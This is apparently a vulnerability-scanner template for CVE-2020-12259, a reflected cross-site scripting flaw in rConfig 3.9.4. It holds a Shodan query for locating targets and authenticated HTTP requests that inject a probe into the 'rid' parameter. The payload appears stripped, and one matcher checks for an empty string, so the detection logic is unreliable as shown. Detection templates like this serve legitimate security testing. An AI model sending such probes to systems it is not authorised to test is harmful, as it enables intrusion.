id: CVE-2020-12259
info:
name: rConfig 3.9.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12259
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-12259
cwe-id: CWE-79
epss-score: 0.16256
epss-percentile: 0.95462
cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 3
vendor: rconfig
product: rconfig
shodan-query: http.title:"rConfig"
tags: cve,cve2020,rconfig,authenticated,xss
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /configDevice.php?rid="> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition: and
# digest: 4b0a00483046022100f621739227444aa078bc7b97c628bdc3fbcdf1ac541b4c5ada4e91612ebd6667022100c8f40cd3ae40f0fb321cc3876cb959624dab515b62642d6236d8110ece094673:922c64590222798bb761d5b6d8e72950